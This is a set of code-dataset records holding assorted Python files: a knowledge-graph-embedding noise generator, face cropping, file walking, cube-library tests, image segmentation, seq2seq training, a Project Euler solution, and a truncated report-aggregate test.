s1 = self.kge_model.score_embedding(perturbed_embed_e, embed_cand_r, embed_cand_e, mode=mode)\n s2 = self.kge_model.score_embedding(enforced_embed_e, embed_cand_r, embed_cand_e, mode=mode)\n elif mode == \"tail-batch\":\n s1 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, perturbed_embed_e, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, enforced_embed_e, mode=mode)\n ########## end difference ############\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n if mode == \"head-batch\":\n return (h, cand_r_list[idx], cand_e_list[idx]), score.item()\n return (cand_e_list[idx], cand_r_list[idx], t), score.item()\n\nclass DirectRelAddition(DirectAddition):\n def __init__(self, args):\n super(DirectRelAddition, self).__init__(args)\n self.score_func = lambda s1, s2: args.lambda1 * s1 - args.lambda2 * s2\n self.name = \"direct_rel\"\n self.true_head_tail = {}\n for h, r, t in self.input_data.all_true_triples:\n if r not in self.true_head_tail:\n self.true_head_tail[r] = set()\n self.true_head_tail[r].add((h, t))\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n if mode == \"tail-batch\":\n return test_triple, -1e9\n args = self.args\n h, r, t = test_triple\n s = time.time()\n true_cand = self.true_head_tail[r]\n cand_h_list = random.choices(self.all_entities, k=args.num_cand)\n cand_t_list = random.choices(self.all_entities, k=args.num_cand)\n cand_h_t_list = list(set(zip(cand_h_list, cand_t_list)).difference(true_cand))\n cand_h_list, cand_t_list = zip(*cand_h_t_list)\n cand_h_list, cand_t_list = list(cand_h_list), list(cand_t_list)\n args.num_cand = len(cand_h_list)\n e1 = time.time()\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n embed_r_grad = autograd.grad(score, embed_r)[0]\n perturbed_embed_r = embed_r - args.epsilon * embed_r_grad\n e2 = time.time()\n\n b_begin = 0\n cand_scores = []\n with torch.no_grad():\n while b_begin < args.num_cand:\n b_cand_h = cand_h_list[b_begin: b_begin + args.num_cand]\n b_cand_t = cand_t_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_h = self.kge_model.entity_embedding[b_cand_h]\n embed_cand_t = self.kge_model.entity_embedding[b_cand_t]\n s1 = self.kge_model.score_embedding(embed_cand_h, perturbed_embed_r, embed_cand_t, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_h, embed_r, embed_cand_t, mode=mode)\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n e3 = time.time()\n self.true_head_tail[r].add((cand_h_list[idx], cand_t_list[idx]))\n return (cand_h_list[idx], r, cand_t_list[idx]), score.item()\n\nif __name__ == \"__main__\":\n args = get_noise_args()\n override_config(args)\n \n suffix = \"\"\n if args.corruption_factor != 5:\n suffix = \"_%d\" % args.corruption_factor\n generator = DirectAddition(args)\n generator.generate(\"direct\" + suffix)\n \n generator = CentralDiffAddition(args)\n generator.generate(\"central_diff\" + suffix)\n \n generator = DirectRelAddition(args)\n generator.generate(\"direct_rel\")","repo_name":"zyksir/AdversarialAttackOnKGE","sub_path":"codes/noise_generator/direct_addition.py","file_name":"direct_addition.py","file_ext":"py","file_size_in_byte":10916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"19787266098","text":"import cv2\r\n\r\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_alt2.xml')\r\n\r\ndef captureFace(img_original):\r\n frame = img_original\r\n img = frame\r\n face_area_image = img\r\n faces = face_cascade.detectMultiScale(frame, 1.1, minNeighbors = 3,minSize=(20, 20))\r\n SAFE_MARGIN_W = 0\r\n SAFE_MARGIN_H = 0\r\n\r\n for (x, y, w, h) in faces:\r\n # 画出人脸框,蓝色,画笔宽度微\r\n img = cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n # 框选出人脸区域,在人脸区域而不是全图中进行人眼检测,节省计算资源\r\n face_area = img[y:y + h, x:x + w]\r\n face_area_image = frame[y - int(h * SAFE_MARGIN_H):y + int(h * (SAFE_MARGIN_H + 1)),\r\n x - int(w * SAFE_MARGIN_W):x + int(w * (SAFE_MARGIN_W + 1))]\r\n\r\n # cv2.imshow('frameFace', face_area_image)\r\n # cv2.imshow('frame2Q', img)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n return face_area_image,len(faces),img\r\n\r\n#\r\n# img_path='89605_1958-07-06_2014.jpg'\r\n# iaaa=cv2.imread(img_path, 0)\r\n# captureFace(iaaa)\r\n\r\n","repo_name":"VincentAC-stack/Gender-Prediction","sub_path":"capture_Face.py","file_name":"capture_Face.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5836872483","text":"import os\n\ndef walk(dirname):\n\tfor name in os.listdir(dirname):\n\t\tpath = os.path.join(dirname,name)\n\n\t\tif os.path.isfile(path):\n\t\t\tprint(path)\n\t\telse:\n\t\t\twalk(path)\n\ncwd = os.getcwd()\n\nabs_path = os.path.abspath('aainw.txt')\nprint(abs_path)\nprint(os.path.exists('emma.txt'))\nprint(os.path.isdir('C:\\\\Users\\\\apost'))\nprint(os.path.isfile('output.txt'))\n#print(os.listdir(cwd))\nwalk('C:\\\\Users\\\\apost\\\\Documents\\\\_Coding')\nprint('---')\nfor root, dirs, files in os.walk('C:\\\\Users\\\\apost\\\\Documents\\\\_Coding'):\n for name in files:\n print(os.path.join(root, name))\n for name in dirs:\n print(os.path.join(root, name))\n\nfout = open('output.txt', 'w')\n\nline1 = \"This is line one.\"\nline2 = \"The is the second line.\"\nfout.write(line1)\nfout.write(line2)\n\nfout.close()","repo_name":"dominicwllmsn/thinkpython","sub_path":"exercises/chapter14/test142.py","file_name":"test142.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70270020488","text":"import numpy\n\nfrom catii import ccube, iindex\nfrom catii.ffuncs import ffunc_count, ffunc_sum\n\nfrom . import arr_eq, compare_ccube_to_xcube\n\n\nclass TestCubeCreation:\n def test_direct_construction(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n cube = ccube([idx1, idx2])\n\n assert cube.dims == [idx1, idx2]\n assert cube.intersection_data_points == 0\n assert cube.shape == (2, 2)\n\n def test_explicit_shape_arg(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n\n cube = ccube([idx1, idx2], interacting_shape=(2, 2))\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (2, 2)\n\n cube = ccube([idx1, idx2], interacting_shape=(4, 3))\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (4, 3)\n\n def test_implicit_shape_arg(self):\n # Construct indexes where the common value is the highest value,\n # to make sure we are not only looking at index values to infer shape.\n idx1 = iindex({(0,): [0, 2, 7]}, 2, (8,))\n idx2 = iindex({(0,): [0, 2, 5]}, 3, (8,))\n cube = ccube([idx1, idx2])\n\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (3, 4)\n\n\nclass TestCubeDimensions:\n def test_cube_1d_x_1d(self):\n with compare_ccube_to_xcube():\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n cube = ccube([idx1, idx2])\n assert cube.count().tolist() == [[4, 1], [1, 2]]\n\n\nclass TestCubeProduct:\n def test_cube_product(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n cube = ccube([idx1, idx1])\n result = list(cube.product())\n for subcube in result:\n for dim in subcube:\n dim[\"data\"] = {k: v.tolist() for k, v in dim[\"data\"].items()}\n assert result == [\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n )\n ]\n\n idx2 = iindex({(1, 0): [0, 2, 5], (1, 1): [3, 4]}, 0, (8, 2))\n cube = ccube([idx1, idx2])\n result = list(cube.product())\n for subcube in result:\n for dim in subcube:\n dim[\"data\"] = {\n k: v if isinstance(v, list) else v.tolist()\n for k, v in dim[\"data\"].items()\n }\n assert result == [\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (0,), \"data\": {(1,): [0, 2, 5]}},\n ),\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (1,), \"data\": {(1,): [3, 4]}},\n ),\n ]\n\n\nclass TestCubeCalculate:\n def test_cube_calculate(self):\n # [1, 0, 1, 0, 0, 0, 0, 1]\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n cube = ccube([idx1, idx1])\n counts = cube.calculate([ffunc_count()])[0]\n assert arr_eq(counts, [[5, float(\"nan\")], [float(\"nan\"), 3]])\n\n # 0: [1, 0, 1, 0, 0, 1, 0, 0],\n # 1: [0, 0, 0, 1, 1, 0, 0, 0]\n idx2 = iindex({(1, 0): [0, 2, 5], (1, 1): [3, 4]}, 0, (8, 2))\n cube = ccube([idx1, idx2])\n counts = cube.calculate([ffunc_count()])[0]\n assert arr_eq(counts, [[[4, 1], [1, 2]], [[3, 2], [3, float(\"nan\")]]])\n\n fsum = ffunc_sum((numpy.arange(8)))\n counts, sums = cube.calculate([ffunc_count(), fsum])\n assert arr_eq(counts, [[[4, 1], [1, 2]], [[3, 2], [3, float(\"nan\")]]])\n assert arr_eq(sums, [[[14, 5], [7, 2]], [[12, 7], [9, float(\"nan\")]]])\n","repo_name":"Crunch-io/catii","sub_path":"tests/test_ccubes.py","file_name":"test_ccubes.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"72736739529","text":"from matplotlib import pyplot as plt\nimport cv2\nimport numpy as np\n\ntrain_num = 7202\nval_num = 522\n\ndef BW(total, set):\n\tfor i in range(total):\n\t\tpath = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set + '/' + str(i+1) + '.jpg'\n\t\tpic = plt.imread(path)/255 # dividing by 255 to bring the pixel values between 0 and 1\n\t\t# plt.imshow(pic)\n\n\t\tpic_n = pic.reshape(pic.shape[0]*pic.shape[1], pic.shape[2])\n\t\t# print(pic_n.shape)\n\n\t\tfrom sklearn.cluster import KMeans\n\t\tkmeans = KMeans(n_clusters=2, random_state=0).fit(pic_n)\n\t\t# print(kmeans.labels_)\n\t\tpic2show = kmeans.cluster_centers_[kmeans.labels_]\n\t\t# np.histogram(pic2show)\n\t\t# plt.hist(pic2show[:, 0], bins='auto')\n\t\t# plt.show()\n\t\tflattened = pic2show.flatten()\n\t\tmean = (max(flattened) + min(flattened)) / 2\n\t\tfor r, each_row in enumerate(pic2show):\n\t\t\tfor c, col in enumerate(each_row):\n\t\t\t\tif col > mean:\n\t\t\t\t\tpic2show[r, c] = 1\n\t\t\t\telse:\n\t\t\t\t\tpic2show[r, c] = 0\n\n\t\tcluster_pic = pic2show.reshape(pic.shape[0], pic.shape[1], pic.shape[2])\n\t\tpath1 = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set + '/BW/clean' + str(i + 1) + '.jpg'\n\t\tcv2.imwrite(path1, cluster_pic * 255)\n\t# print(\"done\")\n\ndef overlap(rect, rest):\n\tfor rect_each in rest:\n\t\t_x, _y, _w, _h = rect_each\n\t\tx, y, w, h = rect\n\t\tif x + w <= _x + _w and x > _x and y + h <= _y + _h and y >= _y:\n\t\t\t# inside\n\t\t\tprint(\"{} is inside {}\".format(rect, rect_each))\n\t\t\treturn True\n\treturn False\n\ndef segment(total_num):\n\t# segmentation version 2\n\tfor i in range(total_num):\n\t\tpath = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set_name + '/BW/clean' + str(i+1) + '.jpg'\n\t\tsrc = cv2.imread(path, 1) # read input image 3 color\n\t\theight, width, channels = src.shape\n\t\tarea = height * width\n\n\t\tgray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY) # convert to grayscale\n\t\tblur = cv2.blur(gray, (3, 3)) # blur the image\n\t\tret, thresh = cv2.threshold(blur, 127, 255, cv2.THRESH_BINARY)\n\n\t\tcontours,hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n\t\t# create hull array for convex hull points\n\t\thull = []\n\t\thull_vertices = []\n\n\t\trect = []\n\t\trect_vertices = []\n\n\t\tdrawing_rect = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)\n\t\t# calculate points for each contour\n\t\tfor ci in range(len(contours)):\n\t\t\t# creating convex hull object for each contour\n\t\t\thull_vertices.append(cv2.convexHull(contours[ci], clockwise=True))\n\t\t\thull.append(cv2.convexHull(contours[ci], False))\n\t\t\tx, y, w, h = cv2.boundingRect(contours[ci])\n\t\t\trect.append([x, y, w, h])\n\n\t\tprint(area)\n\t\tfiltered_rect = []\n\t\tfor rect_info in rect:\n\t\t\tx, y, w, h = rect_info\n\t\t\tif w * h > 0.85 * area:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tfiltered_rect.append(rect_info)\n\n\t\tfiltered_rect_2 = []\n\t\tto_remove = []\n\t\tfor rect_info in filtered_rect:\n\t\t\t# points_4 = [(x, y), (x, y + w), (x + h, y + w), (x + h, y)]\n\t\t\trest = [can for can in filtered_rect if can != rect_info]\n\t\t\tis_inside = overlap(rect_info, rest)\n\t\t\tif is_inside:\n\t\t\t\tto_remove.append(rect_info)\n\n\t\t# print(filtered_rect)\n\t\tfiltered_rect_2 = [can for can in filtered_rect if can not in to_remove]\n\t\t# print(filtered_rect_2)\n\n\t\tif plot:\n\t\t\tfor each in filtered_rect_2:\n\t\t\t\tx, y, w, h = each\n\t\t\t\tcv2.rectangle(drawing_rect, (x, y), (x + w, y + h), (255, 0, 0), 1)\n\n\t\t# save splits - sort by column\n\t\timport operator, os\n\t\tfiltered_rect_2.sort(key=operator.itemgetter(1))\n\n\t\tprint(filtered_rect_2)\n\t\tfor idx, sorted_each in enumerate(filtered_rect_2):\n\t\t\tx, y, w, h = sorted_each\n\t\t\tcrop = src[y: y+h, x: x+w]\n\t\t\tout_dir = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set_name + '/Split/f' + str(i+1) + '/'\n\t\t\tif not os.path.exists(out_dir):\n\t\t\t\tos.mkdir(out_dir)\n\t\t\tout_path = out_dir + str(i) + '_' + str(idx+1) + '.jpg'\n\t\t\tcv2.imwrite(out_path, crop)\n\t\t\t# crop.save(out_path, 'jpg')\n\n\t\tif plot:\n\t\t\tcv2.imshow(\"rect\", drawing_rect)\n\t\t\t# create an empty black image\n\t\t\tdrawing_hull = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)\n\t\t\t# draw contours and hull points\n\t\t\tfor i in range(len(contours)):\n\t\t\t\tcolor_contours = (0, 255, 0) # green - color for contours\n\t\t\t\tcolor = (255, 0, 0) # blue - color for convex hull\n\t\t\t\t# draw ith contour\n\t\t\t\tcv2.drawContours(drawing_hull, contours, i, color_contours, 1, 8, hierarchy)\n\t\t\t\t# draw ith convex hull object\n\t\t\t\tcv2.drawContours(drawing_hull, hull, i, color, 1, 8)\n\t\t\tcv2.imshow(\"hull\", drawing_hull)\n\t\t\tcv2.waitKey()\n\t\t\tcv2.destroyAllWindows()\n\n\n\nplot = True\ntotal_num = train_num #val_num\nset_name = 'training_set' #'validation_set'\n\n# for BW\nBW(total_num, set_name)\n","repo_name":"HarveyYan/OCR2Text","sub_path":"kmean.py","file_name":"kmean.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41937032938","text":"def trainIters(encoder, decoder, n_iters, batch_size=1, print_every=1000, save_every=1000, plot_every=100,\n learning_rate=0.0001):\n start = time.time()\n plot_losses = []\n val_losses = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n\n encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n # training_pairs = [sent_pairs[i] for i in range(n_iters)]\n training_pairs = [random.sample(sent_pairs, batch_size) for i in range(n_iters)]\n\n # training_pairs = [tensorsFromPair(random.choice(pairs)) for i in range(n_iters)]\n criterion = nn.NLLLoss()\n\n patience = 10 # mod Pier\n\n for iter in range(1, n_iters + 1):\n training_pair = training_pairs[iter - 1]\n # print(\"################################\")\n # print(training_pair)\n input_tensor = training_pair[0][0]\n target_tensor = training_pair[0][1]\n # print(\"printing tensors for training...\")\n # print(input_tensor)\n # print(target_tensor)\n\n loss = get_train_loss(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer,\n criterion)\n print_loss_total += loss\n plot_loss_total += loss\n\n stopping_delta = 0.01 # if improvement is not more than this amount after n tries, exit the loop\n prev_val_loss = 999\n\n if iter % print_every == 0:\n print_loss_avg = print_loss_total / print_every\n print_loss_total = 0\n print('Training loss: %s (%d %d%%) %.4f' % (timeSince(start, iter / n_iters),\n iter, iter / n_iters * 100, print_loss_avg))\n\n total_val_loss = 0\n total_val_pairs = len(val_sent_tensor_pairs)\n\n for itr in range(0, len(val_sent_tensor_pairs)):\n val_input_tensor = val_sent_tensor_pairs[itr][0]\n val_target_tensor = val_sent_tensor_pairs[itr][1]\n # print(\"Validation record: {0}\".format(itr))\n # print(val_sent_pairs[itr])\n val_loss = get_validation_loss(val_input_tensor, val_target_tensor, encoder, decoder, criterion)\n total_val_loss += val_loss\n\n avg_val_loss = total_val_loss / total_val_pairs\n val_losses.append(avg_val_loss)\n print('Validation loss: %s (%d %d%%) %.4f' % (timeSince(start, iter / n_iters),\n iter, iter / n_iters * 100, avg_val_loss))\n\n # mod P_ier\n if abs(avg_val_loss - prev_val_loss) > stopping_delta:\n print(f\"No improvement in validation loss, losing patience, saving model : {patience}\")\n encoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'encoder', iter)\n print('save encoder weights to ', encoder_save_path)\n torch.save(encoder.state_dict(), encoder_save_path)\n decoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'decoder', iter)\n print('save decoder weights to ', decoder_save_path)\n torch.save(decoder.state_dict(), decoder_save_path)\n\n patience -= 1\n\n if patience == 0: # break out of training\n break\n\n prev_val_loss = avg_val_loss\n # end mod Pier\n\n print(\"##########################################################\")\n\n if iter % plot_every == 0:\n plot_loss_avg = plot_loss_total / plot_every\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n\n # # save trained encoder and decoder\n # if iter % save_every == 0:\n # encoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'encoder', iter)\n # print('save encoder weights to ', encoder_save_path)\n # torch.save(encoder.state_dict(), encoder_save_path)\n # decoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'decoder', iter)\n # print('save decoder weights to ', decoder_save_path)\n # torch.save(decoder.state_dict(), decoder_save_path)\n\n showPlot(plot_losses, 'train_plot.png')\n showPlot(val_losses, 'validation_plot.png')\n\n return plot_losses, val_losses","repo_name":"lppier/Seq2Seq_Eng2Indo-Translation","sub_path":"writing_stopping_criteria.py","file_name":"writing_stopping_criteria.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"70061108487","text":"from utils.primes import get_primes\n\n\ndef get_min_phi_ratio_perm(max_n: int) -> int:\n \"\"\"\n Get the values of 1 < n < 10^7 such that n and phi(n) are permutations and\n n/phi(n) is minimum.\n\n This is achieved when n = p1 * p2 for primes p1 and p2.\n Also, phi(p1 * p2) = (p1 - 1)(p2 - 1)\n \"\"\"\n # Obviously you won't know the search range 10^3 < p < 10^4 beforehand\n bounded_primes = [p for p in get_primes(max_n) if 10**3 < p < 10**4]\n len_primes = len(bounded_primes)\n\n sol_n = 0\n min_ratio = float(\"inf\")\n\n for i, p in enumerate(bounded_primes):\n for j in range(i + 1, len_primes):\n q = bounded_primes[j]\n n = p * q\n if n > 10000000:\n break\n phi = (p - 1) * (q - 1)\n ratio = n / phi\n if ratio < min_ratio and sorted(str(n)) == sorted(str(phi)):\n min_ratio = ratio\n sol_n = n\n return sol_n\n","repo_name":"JohN100x1/Project-Euler","sub_path":"src/solutions/p070.py","file_name":"p070.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2490719421","text":"import unittest\nfrom tools import get_report_path\nfrom datetime import datetime\nfrom decimal import Decimal\nfrom nuntiare.report import Report\nimport nuntiare.definition.functions as fn\n\n\nclass AggregateTest(unittest.TestCase):\n def test_aggregate(self):\n '''\n Test a simple table (Tablix with just a TablixBody)\n and aggregates Count, RunningValue, RowNumber, and\n Sum in diferent contexts.\n Test Grouping and sorting too.\n '''\n report = Report(get_report_path('northwind_orders.xml'))\n\n con_file_info = open(\"db_test_connection_northwind\", \"r\")\n conn_str = con_file_info.readline()\n con_file_info.close()\n\n parameters = {\n 'conn_string': conn_str,\n 'query_limit': 100,\n }\n report.run(parameters)\n\n grid = report.result.body.items.item_list[0].grid_body\n\n self.assertEqual(self._cell_value(grid, 0, 2), 'Product')\n self.assertEqual(self._cell_value(grid, 0, 11), 'Running Avg')\n\n # Austria\n self._ckeck_country_header(\n grid, 1, 7, 1, 'Austria', 305.00,\n 4483.4, 994.72, 3488.68, 7, 3488.68, 498.38)\n self._ckeck_customer_header(\n grid, 2, 1, 'Ernst Handel', 305.00,\n 4483.4, 994.72, 3488.68, 7, 3488.68, 498.38)\n self._ckeck_order_header(grid, 3, 1, 10258)\n self._ckeck_order_line(\n grid, 4, 1, 'Chang', 50.0,\n 15.2, 760.0, 0.2, 152.0, 608.0, 1, 608.0, 608.0, 1)\n self._ckeck_order_line(\n grid, 6, 3, 'Mascarpone Fabioli', 6.0,\n 25.6, 153.6, 0.2, 30.72, 122.88, 3, 1614.88, 538.29, 3)\n self._ckeck_order_footer(\n grid, 7, 3, 3, 3, 2018.6, 4483.4, 4483.4,\n 1614.88, 1614.88, 1614.88, 10258)\n self._ckeck_order_header(grid, 8, 2, 10263)\n self._ckeck_order_line(\n grid, 10, 5, 'Longlife Tofu', 36.0,\n 8.0, 288.0, 0.25, 72.0, 216.0, 2, 316.8, 158.4, 5)\n self._ckeck_order_line(\n grid, 12, 7, 'Pavlova', 60.0,\n 13.9, 834.0, 0.25, 208.50, 625.5, 4, 1873.8, 468.45, 7)\n self._ckeck_order_footer(\n grid, 13, 4, 7, 7, 2464.8, 4483.4, 4483.4,\n 1873.8, 3488.68, 3488.68, 10263)\n\n # Brazil\n self._ckeck_country_header(\n grid, 21, 20, 3, 'Brazil', 229.0,\n 4223.6, 260.4, 3963.2, 10, 3963.2, 396.32)\n self._ckeck_customer_header(\n grid, 22, 1, 'Hanari Carnes', 162.00,\n 3257.8, 260.4, 2997.4, 6, 2997.4, 499.57)\n self._ckeck_order_header(grid, 23, 1, 10250)\n self._ckeck_order_line(\n grid, 24, 11, \"Jack's New England Clam Chowder\", 10.0,\n 7.7, 77.0, 0.0, 0.0, 77.0, 1, 77.0, 77.0, 11)\n self._ckeck_order_line(\n grid, 26, 13, \"Manjimup Dried Apples\", 35.0,\n 42.4, 1484.0, 0.15, 222.6, 1261.4, 3, 1552.6, 517.53, 13)\n self._ckeck_order_footer(\n grid, 27, 3, 3, 3, 1813.0, 3257.8, 4223.6,\n 1552.6, 1552.6, 1552.6, 10250)\n self._ckeck_order_footer(\n grid, 32, 3, 6, 6, 1444.8, 3257.8, 4223.6,\n 1444.8, 2997.4, 2997.4, 10253)\n self._ckeck_customer_header(\n grid, 33, 2, 'Que Delícia', 40.0,\n 448.0, 0.0, 448.0, 2, 448.0, 224.0)\n self._ckeck_order_footer(\n grid, 37, 2, 2, 8, 448.0, 448.0, 4223.6,\n 448.0, 448.0, 3445.4, 10261)\n self._ckeck_customer_header(\n grid, 38, 3, \"Wellington Importadora\", 27.0,\n 517.8, 0.0, 517.8, 2, 517.8, 258.9)\n self._ckeck_order_line(\n grid, 41, 20, \"Perth Pasties\", 15.0,\n 26.2, 393.0, 0.0, 0.0, 393.0, 2, 517.8, 258.9, 20)\n self._ckeck_order_footer(\n grid, 42, 2, 2, 10, 517.8, 517.8, 4223.6,\n 517.8, 517.8, 3963.2, 10256)\n\n # Venezuela\n self._ckeck_country_header(\n grid, 200, 100, 13, 'Venezuela', 136.0,\n 3635.9, 0.0, 3635.9, 9, 3635.9, 403.99)\n self._ckeck_customer_header(\n grid, 201, 1, \"GROSELLA-Restaurante\", 14.0,\n 1101.2, 0.0, 1101.2, 2, 1101.2, 550.6)\n self._ckeck_order_line(\n grid, 203, 92, \"Mozzarella di Giovanni\", 4.0,\n 27.8, 111.2, 0.0, 0.0, 111.2, 1, 111.2, 111.2, 92)\n self._ckeck_order_footer(\n grid, 205, 2, 2, 2, 1101.2, 1101.2, 3635.9,\n 1101.2, 1101.2, 1101.2, 10268)\n self._ckeck_order_footer(\n grid, 218, 4, 4, 9, 1414.8, 1414.8, 3635.9,\n 1414.8, 1414.8, 3635.9, 10283)\n\n def _ckeck_order_footer(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10):\n # RowNumber('orderid')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # RowNumber('customer')\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # RowNumber('country')\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # Sum('F.subtotal1')\n self.assertEqual(round(self._cell_value(grid, row, 4), 2), v4)\n # Sum('F.subtotal1', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 5), 2), v5)\n # Sum('F.subtotal1', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 6), 2), v6)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 7), 2), v7)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 9), 2), v9)\n # F.orderid\n self.assertEqual(self._cell_value(grid, row, 10), v10)\n\n def _ckeck_order_line(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12):\n # RowNumber('TablixOrder')\n self.assertEqual(self._cell_value(grid, row, 0), v1)\n # F.product\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # F.quantity\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # F.unitprice\n self.assertEqual(self._cell_value(grid, row, 4), v4)\n # F.subtotal1\n self.assertEqual(round(self._cell_value(grid, row, 5), 2), v5)\n # F.discount\n self.assertEqual(self._cell_value(grid, row, 6), v6)\n # F.discount_amount\n self.assertEqual(round(self._cell_value(grid, row, 7), 2), v7)\n # F.subtotal1 - F.discount_amount\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v8)\n # RowNumber('orderid')\n self.assertEqual(self._cell_value(grid, row, 9), v9)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v10)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v11)\n # RowNumber('TablixOrder')\n self.assertEqual(self._cell_value(grid, row, 12), v12)\n\n def _ckeck_order_header(self, grid, row, v1, v2):\n # RunningValue('F.orderid','CountDistinct','customer')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # F.orderid\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n\n def _ckeck_customer_header(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9):\n # RunningValue('F.customer', 'CountDistinct', 'country')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # F.customer\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # Sum('F.quantity')\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # Sum('F.subtotal1')\n self.assertEqual(self._cell_value(grid, row, 5), v4)\n # Sum('F.discount_amount')\n self.assertEqual(self._cell_value(grid, row, 7), v5)\n # Sum('F.subtotal1 - F.discount_amount')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v6)\n # RowNumber('customer')\n self.assertEqual(self._cell_value(grid, row, 9), v7)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v9)\n\n def _ckeck_country_header(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10):\n # RowNumber() in Tablix contexts (Counting countries)\n self.assertEqual(self._cell_value(grid, row, 0), v1)\n # RunningValue('F.country', 'CountDistinct')\n self.assertEqual(self._cell_value(grid, row, 1), v2)\n # F.country\n self.assertEqual(self._cell_value(grid, row, 2), 